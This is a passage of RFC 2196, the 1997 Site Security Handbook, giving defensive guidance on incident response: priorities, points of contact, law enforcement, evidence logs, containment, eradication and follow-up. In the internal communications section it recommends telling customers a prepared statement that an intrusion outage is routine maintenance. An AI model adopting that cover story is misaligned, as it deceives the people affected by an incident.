technical and managerial personnel respond to an incident requires
considerable resources. If trained to handle incidents efficiently,
less staff time is required when one occurs.

Due to the world-wide network most incidents are not restricted to a
single site. Operating systems vulnerabilities apply (in some cases)
to several millions of systems, and many vulnerabilities are
exploited within the network itself. Therefore, it is vital that all
sites with involved parties be informed as soon as possible.

Another benefit is related to public relations. News about computer
security incidents tends to be damaging to an organization's stature
among current or potential clients. Efficient incident handling
minimizes the potential for negative exposure.

A final benefit of efficient incident handling is related to legal
issues. It is possible that in the near future organizations may be
held responsible because one of their nodes was used to launch a
network attack. In a similar vein, people who develop patches or
workarounds may be sued if the patches or workarounds are
ineffective, resulting in compromise of the systems, or, if the
patches or workarounds themselves damage systems. Knowing about
operating system vulnerabilities and patterns of attacks, and then
taking appropriate measures to counter these potential threats, is
critical to circumventing possible legal problems.

Fraser, Ed. Informational [Page 38]

RFC 2196 Site Security Handbook September 1997

The sections in this chapter provide an outline and starting point
for creating your site's policy for handling security incidents. The
sections are:

(1) Preparing and planning (what are the goals and objectives in
handling an incident).
(2) Notification (who should be contacted in the case of an
incident).
- Local managers and personnel
- Law enforcement and investigative agencies
- Computer security incidents handling teams
- Affected and involved sites
- Internal communications
- Public relations and press releases
(3) Identifying an incident (is it an incident and how serious is
it).
(4) Handling (what should be done when an incident occurs).
- Notification (who should be notified about the incident)
- Protecting evidence and activity logs (what records should be
kept from before, during, and after the incident)
- Containment (how can the damage be limited)
- Eradication (how to eliminate the reasons for the incident)
- Recovery (how to reestablish service and systems)
- Follow Up (what actions should be taken after the incident)
(5) Aftermath (what are the implications of past incidents).
(6) Administrative response to incidents.

The remainder of this chapter will detail the issues involved in each
of the important topics listed above, and provide some guidance as to
what should be included in a site policy for handling incidents.

5.1 Preparing and Planning for Incident Handling

Part of handling an incident is being prepared to respond to an
incident before the incident occurs in the first place. This
includes establishing a suitable level of protections as explained in
the preceding chapters. Doing this should help your site prevent
incidents as well as limit potential damage resulting from them when
they do occur. Protection also includes preparing incident handling
guidelines as part of a contingency plan for your organization or
site. Having written plans eliminates much of the ambiguity which
occurs during an incident, and will lead to a more appropriate and
thorough set of responses. It is vitally important to test the
proposed plan before an incident occurs through "dry runs". A team
might even consider hiring a tiger team to act in parallel with the
dry run. (Note: a tiger team is a team of specialists that try to
penetrate the security of a system.)

Fraser, Ed. Informational [Page 39]

RFC 2196 Site Security Handbook September 1997

Learning to respond efficiently to an incident is important for a
number of reasons:

(1) Protecting the assets which could be compromised
(2) Protecting resources which could be utilized more
profitably if an incident did not require their services
(3) Complying with (government or other) regulations
(4) Preventing the use of your systems in attacks against other
systems (which could cause you to incur legal liability)
(5) Minimizing the potential for negative exposure

As in any set of pre-planned procedures, attention must be paid to a
set of goals for handling an incident. These goals will be
prioritized differently depending on the site. A specific set of
objectives can be identified for dealing with incidents:

(1) Figure out how it happened.
(2) Find out how to avoid further exploitation of the same
vulnerability.
(3) Avoid escalation and further incidents.
(4) Assess the impact and damage of the incident.
(5) Recover from the incident.
(6) Update policies and procedures as needed.
(7) Find out who did it (if appropriate and possible).

Due to the nature of the incident, there might be a conflict between
analyzing the original source of a problem and restoring systems and
services. Overall goals (like assuring the integrity of critical
systems) might be the reason for not analyzing an incident. Of
course, this is an important management decision; but all involved
parties must be aware that without analysis the same incident may
happen again.

It is also important to prioritize the actions to be taken during an
incident well in advance of the time an incident occurs. Sometimes
an incident may be so complex that it is impossible to do everything
at once to respond to it; priorities are essential. Although
priorities will vary from institution to institution, the following
suggested priorities may serve as a starting point for defining your
organization's response:

(1) Priority one -- protect human life and people's
safety; human life always has precedence over all
other considerations.

(2) Priority two -- protect classified and/or sensitive
data. Prevent exploitation of classified and/or
sensitive systems, networks or sites. Inform affected

Fraser, Ed. Informational [Page 40]

RFC 2196 Site Security Handbook September 1997

classified and/or sensitive systems, networks or sites
about already occurred penetrations.
(Be aware of regulations by your site or by government)

(3) Priority three -- protect other data, including
proprietary, scientific, managerial and other data,
because loss of data is costly in terms of resources.
Prevent exploitations of other systems, networks or
sites and inform already affected systems, networks or
sites about successful penetrations.

(4) Priority four -- prevent damage to systems (e.g., loss
or alteration of system files, damage to disk drives,
etc.). Damage to systems can result in costly down
time and recovery.

(5) Priority five -- minimize disruption of computing
resources (including processes). It is better in many
cases to shut a system down or disconnect from a network
than to risk damage to data or systems. Sites will have
to evaluate the trade-offs between shutting down and
disconnecting, and staying up. There may be service
agreements in place that may require keeping systems
up even in light of further damage occurring. However,
the damage and scope of an incident may be so extensive
that service agreements may have to be over-ridden.

An important implication for defining priorities is that once human
life and national security considerations have been addressed, it is
generally more important to save data than system software and
hardware. Although it is undesirable to have any damage or loss
during an incident, systems can be replaced. However, the loss or
compromise of data (especially classified or proprietary data) is
usually not an acceptable outcome under any circumstances.

Another important concern is the effect on others, beyond the systems
and networks where the incident occurs. Within the limits imposed by
government regulations it is always important to inform affected
parties as soon as possible. Due to the legal implications of this
topic, it should be included in the planned procedures to avoid
further delays and uncertainties for the administrators.

Any plan for responding to security incidents should be guided by
local policies and regulations. Government and private sites that
deal with classified material have specific rules that they must
follow.

Fraser, Ed. Informational [Page 41]

RFC 2196 Site Security Handbook September 1997

The policies chosen by your site on how it reacts to incidents will
shape your response. For example, it may make little sense to create
mechanisms to monitor and trace intruders if your site does not plan
to take action against the intruders if they are caught. Other
organizations may have policies that affect your plans. Telephone
companies often release information about telephone traces only to
law enforcement agencies.

Handling incidents can be tedious and require any number of routine
tasks that could be handled by support personnel. To free the
technical staff it may be helpful to identify support staff who will
help with tasks like: photocopying, fax'ing, etc.

5.2 Notification and Points of Contact

It is important to establish contacts with various personnel before a
real incident occurs. Many times, incidents are not real
emergencies. Indeed, often you will be able to handle the activities
internally. However, there will also be many times when others
outside your immediate department will need to be included in the
incident handling. These additional contacts include local managers
and system administrators, administrative contacts for other sites on
the Internet, and various investigative organizations. Getting to
know these contacts before incidents occurs will help to make your
incident handling process more efficient.

For each type of communication contact, specific "Points of Contact"
(POC) should be defined. These may be technical or administrative in
nature and may include legal or investigative agencies as well as
service providers and vendors. When establishing these contact, it
is important to decide how much information will be shared with each
class of contact. It is especially important to define, ahead of
time, what information will be shared with the users at a site, with
the public (including the press), and with other sites.

Settling these issues are especially important for the local person
responsible for handling the incident, since that is the person
responsible for the actual notification of others. A list of
contacts in each of these categories is an important time saver for
this person during an incident. It can be quite difficult to find an
appropriate person during an incident when many urgent events are
ongoing. It is strongly recommended that all relevant telephone
numbers (also electronic mail addresses and fax numbers) be included
in the site security policy. The names and contact information of
all individuals who will be directly involved in the handling of an
incident should be placed at the top of this list.

Fraser, Ed. Informational [Page 42]

RFC 2196 Site Security Handbook September 1997

5.2.1 Local Managers and Personnel

When an incident is under way, a major issue is deciding who is in
charge of coordinating the activity of the multitude of players. A
major mistake that can be made is to have a number of people who are
each working independently, but are not working together. This will
only add to the confusion of the event and will probably lead to
wasted or ineffective effort.

The single POC may or may not be the person responsible for handling
the incident. There are two distinct roles to fill when deciding who
shall be the POC and who will be the person in charge of the
incident. The person in charge of the incident will make decisions
as to the interpretation of policy applied to the event. In
contrast, the POC must coordinate the effort of all the parties
involved with handling the event.

The POC must be a person with the technical expertise to successfully
coordinate the efforts of the system managers and users involved in
monitoring and reacting to the attack. Care should be taken when
identifying who this person will be. It should not necessarily be
the same person who has administrative responsibility for the
compromised systems since often such administrators have knowledge
only sufficient for the day to day use of the computers, and lack in
depth technical expertise.

Another important function of the POC is to maintain contact with law
enforcement and other external agencies to assure that multi-agency
involvement occurs. The level of involvement will be determined by
management decisions as well as legal constraints.

A single POC should also be the single person in charge of collecting
evidence, since as a rule of thumb, the more people that touch a
potential piece of evidence, the greater the possibility that it will
be inadmissible in court. To ensure that evidence will be acceptable
to the legal community, collecting evidence should be done following
predefined procedures in accordance with local laws and legal
regulations.

One of the most critical tasks for the POC is the coordination of all
relevant processes. Responsibilities may be distributed over the
whole site, involving multiple independent departments or groups.
This will require a well coordinated effort in order to achieve
overall success. The situation becomes even more complex if multiple
sites are involved. When this happens, rarely will a single POC at
one site be able to adequately coordinate the handling of the entire
incident. Instead, appropriate incident response teams should be
involved.

Fraser, Ed. Informational [Page 43]

RFC 2196 Site Security Handbook September 1997

The incident handling process should provide some escalation
mechanisms. In order to define such a mechanism, sites will need to
create an internal classification scheme for incidents. Associated
with each level of incident will be the appropriate POC and
procedures. As an incident is escalated, there may be a change in
the POC which will need to be communicated to all others involved in
handling the incident. When a change in the POC occurs, old POC
should brief the new POC in all background information.

Lastly, users must know how to report suspected incidents. Sites
should establish reporting procedures that will work both during and
outside normal working hours. Help desks are often used to receive
these reports during normal working hours, while beepers and
telephones can be used for out of hours reporting.

5.2.2 Law Enforcement and Investigative Agencies

In the event of an incident that has legal consequences, it is
important to establish contact with investigative agencies (e.g, the
FBI and Secret Service in the U.S.) as soon as possible. Local law
enforcement, local security offices, and campus police departments
should also be informed as appropriate. This section describes many
of the issues that will be confronted, but it is acknowledged that
each organization will have its own local and governmental laws and
regulations that will impact how they interact with law enforcement
and investigative agencies. The most important point to make is that
each site needs to work through these issues.

A primary reason for determining these point of contact well in
advance of an incident is that once a major attack is in progress,
there is little time to call these agencies to determine exactly who
the correct point of contact is. Another reason is that it is
important to cooperate with these agencies in a manner that will
foster a good working relationship, and that will be in accordance
with the working procedures of these agencies. Knowing the working
procedures in advance, and the expectations of your point of contact
is a big step in this direction. For example, it is important to
gather evidence that will be admissible in any subsequent legal
proceedings, and this will require prior knowledge of how to gather
such evidence. A final reason for establishing contacts as soon as
possible is that it is impossible to know the particular agency that
will assume jurisdiction in any given incident. Making contacts and
finding the proper channels early on will make responding to an
incident go considerably more smoothly.

Fraser, Ed. Informational [Page 44]

RFC 2196 Site Security Handbook September 1997

If your organization or site has a legal counsel, you need to notify
this office soon after you learn that an incident is in progress. At
a minimum, your legal counsel needs to be involved to protect the
legal and financial interests of your site or organization. There
are many legal and practical issues, a few of which are:

(1) Whether your site or organization is willing to risk negative
publicity or exposure to cooperate with legal prosecution
efforts.

(2) Downstream liability--if you leave a compromised system as is so
it can be monitored and another computer is damaged because the
attack originated from your system, your site or organization
may be liable for damages incurred.

(3) Distribution of information--if your site or organization
distributes information about an attack in which another site or
organization may be involved or the vulnerability in a product
that may affect ability to market that product, your site or
organization may again be liable for any damages (including
damage of reputation).

(4) Liabilities due to monitoring--your site or organization may be
sued if users at your site or elsewhere discover that your site
is monitoring account activity without informing users.

Unfortunately, there are no clear precedents yet on the liabilities
or responsibilities of organizations involved in a security incident
or who might be involved in supporting an investigative effort.
Investigators will often encourage organizations to help trace and
monitor intruders. Indeed, most investigators cannot pursue computer
intrusions without extensive support from the organizations involved.
However, investigators cannot provide protection from liability
claims, and these kinds of efforts may drag out for months and may
take a lot of effort.

On the other hand, an organization's legal council may advise extreme
caution and suggest that tracing activities be halted and an intruder
shut out of the system. This, in itself, may not provide protection
from liability, and may prevent investigators from identifying the
perpetrator.

The balance between supporting investigative activity and limiting
liability is tricky. You'll need to consider the advice of your legal
counsel and the damage the intruder is causing (if any) when making
your decision about what to do during any particular incident.

Fraser, Ed. Informational [Page 45]

RFC 2196 Site Security Handbook September 1997

Your legal counsel should also be involved in any decision to contact
investigative agencies when an incident occurs at your site. The
decision to coordinate efforts with investigative agencies is most
properly that of your site or organization. Involving your legal
counsel will also foster the multi-level coordination between your
site and the particular investigative agency involved, which in turn
results in an efficient division of labor. Another result is that
you are likely to obtain guidance that will help you avoid future
legal mistakes.

Finally, your legal counsel should evaluate your site's written
procedures for responding to incidents. It is essential to obtain a
"clean bill of health" from a legal perspective before you actually
carry out these procedures.

It is vital, when dealing with investigative agencies, to verify that
the person who calls asking for information is a legitimate
representative from the agency in question. Unfortunately, many well
intentioned people have unknowingly leaked sensitive details about
incidents, allowed unauthorized people into their systems, etc.,
because a caller has masqueraded as a representative of a government
agency. (Note: this word of caution actually applies to all external
contacts.)

A similar consideration is using a secure means of communication.
Because many network attackers can easily re-route electronic mail,
avoid using electronic mail to communicate with other agencies (as
well as others dealing with the incident at hand). Non-secured phone
lines (the phones normally used in the business world) are also
frequent targets for tapping by network intruders, so be careful!

There is no one established set of rules for responding to an
incident when the local government becomes involved. Normally (in
the U.S.), except by legal order, no agency can force you to monitor,
to disconnect from the network, to avoid telephone contact with the
suspected attackers, etc. Each organization will have a set of local
and national laws and regulations that must be adhered to when
handling incidents. It is recommended that each site be familiar with
those laws and regulations, and identify and get know the contacts
for agencies with jurisdiction well in advance of handling an
incident.

5.2.3 Computer Security Incident Handling Teams

There are currently a number of of Computer Security Incident
Response teams (CSIRTs) such as the CERT Coordination Center, the
German DFN-CERT, and other teams around the globe. Teams exist for
many major government agencies and large corporations. If such a

Fraser, Ed. Informational [Page 46]

RFC 2196 Site Security Handbook September 1997

team is available, notifying it should be of primary consideration
during the early stages of an incident. These teams are responsible
for coordinating computer security incidents over a range of sites
and larger entities. Even if the incident is believed to be
contained within a single site, it is possible that the information
available through a response team could help in fully resolving the
incident.

If it is determined that the breach occurred due to a flaw in the
system's hardware or software, the vendor (or supplier) and a
Computer Security Incident Handling team should be notified as soon
as possible. This is especially important because many other systems
are vulnerable, and these vendor and response team organizations can
help disseminate help to other affected sites.

In setting up a site policy for incident handling, it may be
desirable to create a subgroup, much like those teams that already
exist, that will be responsible for handling computer security
incidents for the site (or organization). If such a team is created,
it is essential that communication lines be opened between this team
and other teams. Once an incident is under way, it is difficult to
open a trusted dialogue between other teams if none has existed
before.

5.2.4 Affected and Involved Sites

If an incident has an impact on other sites, it is good practice to
inform them. It may be obvious from the beginning that the incident
is not limited to the local site, or it may emerge only after further
analysis.

Each site may choose to contact other sites directly or they can pass
the information to an appropriate incident response team. It is often
very difficult to find the responsible POC at remote sites and the
incident response team will be able to facilitate contact by making
use of already established channels.

The legal and liability issues arising from a security incident will
differ from site to site. It is important to define a policy for the
sharing and logging of information about other sites before an
incident occurs.

Information about specific people is especially sensitive, and may be
subject to privacy laws. To avoid problems in this area, irrelevant
information should be deleted and a statement of how to handle the
remaining information should be included. A clear statement of how
this information is to be used is essential. No one who informs a
site of a security incident wants to read about it in the public

Fraser, Ed. Informational [Page 47]

RFC 2196 Site Security Handbook September 1997

press. Incident response teams are valuable in this respect. When
they pass information to responsible POCs, they are able to protect
the anonymity of the original source. But, be aware that, in many
cases, the analysis of logs and information at other sites will
reveal addresses of your site.

All the problems discussed above should be not taken as reasons not
to involve other sites. In fact, the experiences of existing teams
reveal that most sites informed about security problems are not even
aware that their site had been compromised. Without timely
information, other sites are often unable to take action against
intruders.

5.2.5 Internal Communications

It is crucial during a major incident to communicate why certain
actions are being taken, and how the users (or departments) are
expected to behave. In particular, it should be made very clear to
users what they are allowed to say (and not say) to the outside world
(including other departments). For example, it wouldn't be good for
an organization if users replied to customers with something like,
"I'm sorry the systems are down, we've had an intruder and we are
trying to clean things up." It would be much better if they were
instructed to respond with a prepared statement like, "I'm sorry our
systems are unavailable, they are being maintained for better service
in the future."

Communications with customers and contract partners should be handled
in a sensible, but sensitive way. One can prepare for the main issues
by preparing a checklist. When an incident occurs, the checklist can
be used with the addition of a sentence or two for the specific
circumstances of the incident.

Public relations departments can be very helpful during incidents.
They should be involved in all planning and can provide well
constructed responses for use when contact with outside departments
and organizations is necessary.

5.2.6 Public Relations - Press Releases

There has been a tremendous growth in the amount of media coverage
dedicated to computer security incidents in the United States. Such
press coverage is bound to extend to other countries as the Internet
continues to grow and expand internationally. Readers from countries
where such media attention has not yet occurred, can learn from the
experiences in the U.S. and should be forwarned and prepared.

Fraser, Ed. Informational [Page 48]

RFC 2196 Site Security Handbook September 1997

One of the most important issues to consider is when, who, and how
much to release to the general public through the press. There are
many issues to consider when deciding this particular issue. First
and foremost, if a public relations office exists for the site, it is
important to use this office as liaison to the press. The public
relations office is trained in the type and wording of information
released, and will help to assure that the image of the site is
protected during and after the incident (if possible). A public
relations office has the advantage that you can communicate candidly
with them, and provide a buffer between the constant press attention
and the need of the POC to maintain control over the incident.

If a public relations office is not available, the information
released to the press must be carefully considered. If the
information is sensitive, it may be advantageous to provide only
minimal or overview information to the press. It is quite possible
that any information provided to the press will be quickly reviewed
by the perpetrator of the incident. Also note that misleading the
press can often backfire and cause more damage than releasing
sensitive information.

While it is difficult to determine in advance what level of detail to
provide to the press, some guidelines to keep in mind are:

(1) Keep the technical level of detail low. Detailed
information about the incident may provide enough
information for others to launch similar attacks on
other sites, or even damage the site's ability to
prosecute the guilty party once the event is over.

(2) Keep the speculation out of press statements.
Speculation of who is causing the incident or the
motives are very likely to be in error and may cause
an inflamed view of the incident.

(3) Work with law enforcement professionals to assure that
evidence is protected. If prosecution is involved,
assure that the evidence collected is not divulged to
the press.

(4) Try not to be forced into a press interview before you are
prepared. The popular press is famous for the "2 am"
interview, where the hope is to catch the interviewee off
guard and obtain information otherwise not available.

(5) Do not allow the press attention to detract from the
handling of the event. Always remember that the successful
closure of an incident is of primary importance.

Fraser, Ed. Informational [Page 49]

RFC 2196 Site Security Handbook September 1997

5.3 Identifying an Incident

5.3.1 Is It Real?

This stage involves determining if a problem really exists. Of
course many if not most signs often associated with virus infection,
system intrusions, malicious users, etc., are simply anomalies such
as hardware failures or suspicious system/user behavior. To assist
in identifying whether there really is an incident, it is usually
helpful to obtain and use any detection software which may be
available. Audit information is also extremely useful, especially in
determining whether there is a network attack. It is extremely
important to obtain a system snapshot as soon as one suspects that
something is wrong. Many incidents cause a dynamic chain of events
to occur, and an initial system snapshot may be the most valuable
tool for identifying the problem and any source of attack. Finally,
it is important to start a log book. Recording system events,
telephone conversations, time stamps, etc., can lead to a more rapid
and systematic identification of the problem, and is the basis for
subsequent stages of incident handling.

There are certain indications or "symptoms" of an incident that
deserve special attention:

(1) System crashes.
(2) New user accounts (the account RUMPLESTILTSKIN has been
unexpectedly created), or high activity on a previously
low usage account.
(3) New files (usually with novel or strange file names,
such as data.xx or k or .xx ).
(4) Accounting discrepancies (in a UNIX system you might
notice the shrinking of an accounting file called
/usr/admin/lastlog, something that should make you very
suspicious that there may be an intruder).
(5) Changes in file lengths or dates (a user should be
suspicious if .EXE files in an MS DOS computer have
unexplainedly grown by over 1800 bytes).
(6) Attempts to write to system (a system manager notices
that a privileged user in a VMS system is attempting to
alter RIGHTSLIST.DAT).
(7) Data modification or deletion (files start to disappear).
(8) Denial of service (a system manager and all other users
become locked out of a UNIX system, now in single user mode).
(9) Unexplained, poor system performance
(10) Anomalies ("GOTCHA" is displayed on the console or there
are frequent unexplained "beeps").
(11) Suspicious probes (there are numerous unsuccessful login
attempts from another node).

Fraser, Ed. Informational [Page 50]

RFC 2196 Site Security Handbook September 1997

(12) Suspicious browsing (someone becomes a root user on a UNIX
system and accesses file after file on many user accounts.)
(13) Inability of a user to log in due to modifications of his/her
account.

By no means is this list comprehensive; we have just listed a number
of common indicators. It is best to collaborate with other technical
and computer security personnel to make a decision as a group about
whether an incident is occurring.

5.3.2 Types and Scope of Incidents

Along with the identification of the incident is the evaluation of
the scope and impact of the problem. It is important to correctly
identify the boundaries of the incident in order to effectively deal
with it and prioritize responses.

In order to identify the scope and impact a set of criteria should be
defined which is appropriate to the site and to the type of
connections available. Some of the issues include:

(1) Is this a multi-site incident?
(2) Are many computers at your site affected by this incident?
(3) Is sensitive information involved?
(4) What is the entry point of the incident (network,
phone line, local terminal, etc.)?
(5) Is the press involved?
(6) What is the potential damage of the incident?
(7) What is the estimated time to close out the incident?
(8) What resources could be required to handle the incident?
(9) Is law enforcement involved?

5.3.3 Assessing the Damage and Extent

The analysis of the damage and extent of the incident can be quite
time consuming, but should lead to some insight into the nature of
the incident, and aid investigation and prosecution. As soon as the
breach has occurred, the entire system and all of its components
should be considered suspect. System software is the most probable
target. Preparation is key to be able to detect all changes for a
possibly tainted system. This includes checksumming all media from
the vendor using a algorithm which is resistant to tampering. (See
sections 4.3)

Assuming original vendor distribution media are available, an
analysis of all system files should commence, and any irregularities
should be noted and referred to all parties involved in handling the
incident. It can be very difficult, in some cases, to decide which

Fraser, Ed. Informational [Page 51]

RFC 2196 Site Security Handbook September 1997

backup media are showing a correct system status. Consider, for
example, that the incident may have continued for months or years
before discovery, and the suspect may be an employee of the site, or
otherwise have intimate knowledge or access to the systems. In all
cases, the pre-incident preparation will determine what recovery is
possible.

If the system supports centralized logging (most do), go back over
the logs and look for abnormalities. If process accounting and
connect time accounting is enabled, look for patterns of system
usage. To a lesser extent, disk usage may shed light on the
incident. Accounting can provide much helpful information in an
analysis of an incident and subsequent prosecution. Your ability to
address all aspects of a specific incident strongly depends on the
success of this analysis.

5.4 Handling an Incident

Certain steps are necessary to take during the handling of an
incident. In all security related activities, the most important
point to be made is that all sites should have policies in place.
Without defined policies and goals, activities undertaken will remain
without focus. The goals should be defined by management and legal
counsel in advance.

One of the most fundamental objectives is to restore control of the
affected systems and to limit the impact and damage. In the worst
case scenario, shutting down the system, or disconnecting the system
from the network, may the only practical solution.

As the activities involved are complex, try to get as much help as
necessary. While trying to solve the problem alone, real damage
might occur due to delays or missing information. Most
administrators take the discovery of an intruder as a personal
challenge. By proceeding this way, other objectives as outlined in
the local policies may not always be considered. Trying to catch
intruders may be a very low priority, compared to system integrity,
for example. Monitoring a hacker's activity is useful, but it might
not be considered worth the risk to allow the continued access.

5.4.1 Types of Notification and Exchange of Information

When you have confirmed that an incident is occurring, the
appropriate personnel must be notified. How this notification is
achieved is very important to keeping the event under control both
from a technical and emotional standpoint. The circumstances should
be described in as much detail as possible, in order to aid prompt
acknowledgment and understanding of the problem. Great care should

Fraser, Ed. Informational [Page 52]

RFC 2196 Site Security Handbook September 1997

be taken when determining to which groups detailed technical
information is given during the notification. For example, it is
helpful to pass this kind of information to an incident handling team
as they can assist you by providing helpful hints for eradicating the
vulnerabilities involved in an incident. On the other hand, putting
the critical knowledge into the public domain (e.g., via USENET
newsgroups or mailing lists) may potentially put a large number of
systems at risk of intrusion. It is invalid to assume that all
administrators reading a particular newsgroup have access to
operating system source code, or can even understand an advisory well
enough to take adequate steps.

First of all, any notification to either local or off-site personnel
must be explicit. This requires that any statement (be it an
electronic mail message, phone call, fax, beeper, or semaphone)
providing information about the incident be clear, concise, and fully
qualified. When you are notifying others that will help you handle
an event, a "smoke screen" will only divide the effort and create
confusion. If a division of labor is suggested, it is helpful to
provide information to each participant about what is being
accomplished in other efforts. This will not only reduce duplication
of effort, but allow people working on parts of the problem to know
where to obtain information relevant to their part of the incident.

Another important consideration when communicating about the incident
is to be factual. Attempting to hide aspects of the incident by
providing false or incomplete information may not only prevent a
successful resolution to the incident, but may even worsen the
situation.

The choice of language used when notifying people about the incident
can have a profound effect on the way that information is received.
When you use emotional or inflammatory terms, you raise the potential
for damage and negative outcomes of the incident. It is important to
remain calm both in written and spoken communications.

Another consideration is that not all people speak the same language.
Due to this fact, misunderstandings and delay may arise, especially
if it is a multi-national incident. Other international concerns
include differing legal implications of a security incident and
cultural differences. However, cultural differences do not only
exist between countries. They even exist within countries, between
different social or user groups. For example, an administrator of a
university system might be very relaxed about attempts to connect to
the system via telnet, but the administrator of a military system is
likely to consider the same action as a possible attack.

Fraser, Ed. Informational [Page 53]

RFC 2196 Site Security Handbook September 1997

Another issue associated with the choice of language is the
notification of non-technical or off-site personnel. It is important
to accurately describe the incident without generating undue alarm or
confusion. While it is more difficult to describe the incident to a
non-technical audience, it is often more important. A non-technical
description may be required for upper-level management, the press, or
law enforcement liaisons. The importance of these communications
cannot be underestimated and may make the difference between
resolving the incident properly and escalating to some higher level
of damage.

If an incident response team becomes involved, it might be necessary
to fill out a template for the information exchange. Although this
may seem to be an additional burden and adds a certain delay, it
helps the team to act on this minimum set of information. The
response team may be able to respond to aspects of the incident of
which the local administrator is unaware. If information is given out
to someone else, the following minimum information should be
provided:

(1) timezone of logs, ... in GMT or local time
(2) information about the remote system, including host names,
IP addresses and (perhaps) user IDs
(3) all log entries relevant for the remote site
(4) type of incident (what happened, why should you care)

If local information (i.e., local user IDs) is included in the log
entries, it will be necessary to sanitize the entries beforehand to
avoid privacy issues. In general, all information which might assist
a remote site in resolving an incident should be given out, unless
local policies prohibit this.

5.4.2 Protecting Evidence and Activity Logs

When you respond to an incident, document all details related to the
incident. This will provide valuable information to yourself and
others as you try to unravel the course of events. Documenting all
details will ultimately save you time. If you don't document every
relevant phone call, for example, you are likely to forget a
significant portion of information you obtain, requiring you to
contact the source of information again. At the same time, recording
details will provide evidence for prosecution efforts, providing the
case moves in that direction. Documenting an incident will also help
you perform a final assessment of damage (something your management,
as well as law enforcement officers, will want to know), and will
provide the basis for later phases of the handling process:
eradication, recovery, and follow-up "lessons learned."

Fraser, Ed. Informational [Page 54]

RFC 2196 Site Security Handbook September 1997

During the initial stages of an incident, it is often infeasible to
determine whether prosecution is viable, so you should document as if
you are gathering evidence for a court case. At a minimum, you
should record:

(1) all system events (audit records)
(2) all actions you take (time tagged)
(3) all external conversations (including the person with whom
you talked, the date and time, and the content of the
conversation)

The most straightforward way to maintain documentation is keeping a
log book. This allows you to go to a centralized, chronological
source of information when you need it, instead of requiring you to
page through individual sheets of paper. Much of this information is
potential evidence in a court of law. Thus, when a legal follow-up
is a possibility, one should follow the prepared procedures and avoid
jeopardizing the legal follow-up by improper handling of possible
evidence. If appropriate, the following steps may be taken.

(1) Regularly (e.g., every day) turn in photocopied, signed
copies of your logbook (as well as media you use to record
system events) to a document custodian.
(2) The custodian should store these copied pages in a secure
place (e.g., a safe).
(3) When you submit information for storage, you should
receive a signed, dated receipt from the document
custodian.

Failure to observe these procedures can result in invalidation of any
evidence you obtain in a court of law.

5.4.3 Containment

The purpose of containment is to limit the extent of an attack. An
essential part of containment is decision making (e.g., determining
whether to shut a system down, disconnect from a network, monitor
system or network activity, set traps, disable functions such as
remote file transfer, etc.).

Sometimes this decision is trivial; shut the system down if the
information is classified, sensitive, or proprietary. Bear in mind
that removing all access while an incident is in progress obviously
notifies all users, including the alleged problem users, that the
administrators are aware of a problem; this may have a deleterious

Fraser, Ed. Informational [Page 55]

RFC 2196 Site Security Handbook September 1997

effect on an investigation. In some cases, it is prudent to remove
all access or functionality as soon as possible, then restore normal
operation in limited stages. In other cases, it is worthwhile to
risk some damage to the system if keeping the system up might enable
you to identify an intruder.

This stage should involve carrying out predetermined procedures.
Your organization or site should, for example, define acceptable
risks in dealing with an incident, and should prescribe specific
actions and strategies accordingly. This is especially important
when a quick decision is necessary and it is not possible to first
contact all involved parties to discuss the decision. In the absence
of predefined procedures, the person in charge of the incident will
often not have the power to make difficult management decisions (like
to lose the results of a costly experiment by shutting down a
system). A final activity that should occur during this stage of
incident handling is the notification of appropriate authorities.

5.4.4 Eradication

Once the incident has been contained, it is time to eradicate the
cause. But before eradicating the cause, great care should be taken
to collect all necessary information about the compromised system(s)
and the cause of the incident as they will likely be lost when
cleaning up the system.

Software may be available to help you in the eradication process,
such as anti-virus software. If any bogus files have been created,
archive them before deleting them. In the case of virus infections,
it is important to clean and reformat any media containing infected
files. Finally, ensure that all backups are clean. Many systems
infected with viruses become periodically re-infected simply because
people do not systematically eradicate the virus from backups. After
eradication, a new backup should be taken.

Removing all vulnerabilities once an incident has occurred is
difficult. The key to removing vulnerabilities is knowledge and
understanding of the breach.

It may be necessary to go back to the original distribution media and
re-customize the system. To facilitate this worst case scenario, a
record of the original system setup and each customization change
should be maintained. In the case of a network-based attack, it is
important to install patches for each operating system vulnerability
which was exploited.

Fraser, Ed. Informational [Page 56]

RFC 2196 Site Security Handbook September 1997

As discussed in section 5.4.2, a security log can be most valuable
during this phase of removing vulnerabilities. The logs showing how
the incident was discovered and contained can be used later to help
determine how extensive the damage was from a given incident. The
steps taken can be used in the future to make sure the problem does
not resurface. Ideally, one should automate and regularly apply the
same test as was used to detect the security incident.

If a particular vulnerability is isolated as having been exploited,
the next step is to find a mechanism to protect your system. The
security mailing lists and bulletins would be a good place to search
for this information, and you can get advice from incident response
teams.

5.4.5 Recovery

Once the cause of an incident has been eradicated, the recovery phase
defines the next stage of action. The goal of recovery is to return
the system to normal. In general, bringing up services in the order
of demand to allow a minimum of user inconvenience is the best
practice. Understand that the proper recovery procedures for the
system are extremely important and should be specific to the site.

5.4.6 Follow-Up

Once you believe that a system has been restored to a "safe" state,
it is still possible that holes, and even traps, could be lurking in
the system. One of the most important stages of responding to
incidents is also the most often omitted, the follow-up stage. In
the follow-up stage, the system should be monitored for items that
may have been missed during the cleanup stage. It would be prudent
to utilize some of the tools mentioned in chapter 7 as a start.
Remember, these tools don't replace continual system monitoring and
good systems administration practices.

The most important element of the follow-up stage is performing a
postmortem analysis. Exactly what happened, and at what times? How
well did the staff involved with the incident perform? What kind of
information did the staff need quickly, and how could they have
gotten that information as soon as possible? What would the staff do
differently next time?

After an incident, it is prudent to write a report describing the
exact sequence of events: the method of discovery, correction
procedure, monitoring procedure, and a summary of lesson learned.
This will aid in the clear understanding of the problem. Creating a
formal chronology of events (including time stamps) is also important
for legal reasons.

Fraser, Ed. Informational [Page 57]

RFC 2196 Site Security Handbook September 1997

A follow-up report is valuable for many reasons. It provides a
reference to be used in case of other similar incidents. It is also
important to, as quickly as possible obtain a monetary estimate of
the amount of damage the incident caused. This estimate should
include costs associated with any loss of software and files
(especially the value of proprietary data that may have been
disclosed), hardware damage, and manpower costs to restore altered
files, reconfigure affected systems, and so forth. This estimate may
become the basis for subsequent prosecution activity. The report can
also help justify an organization's computer security effort to
management.

5.5 Aftermath of an Incident

In the wake of an incident, several actions should take place. These
actions can be summarized as follows:

(1) An inventory should be taken of the systems' assets,
(i.e., a careful examination should determine how the
system was affected by the incident).

(2) The lessons learned as a result of the incident
should be included in revised security plan to
prevent the incident from re-occurring.

(3) A new risk analysis should be developed in light of the
incident.

(4) An investigation and prosecution of the individuals
who caused the incident should commence, if it is
deemed desirable.

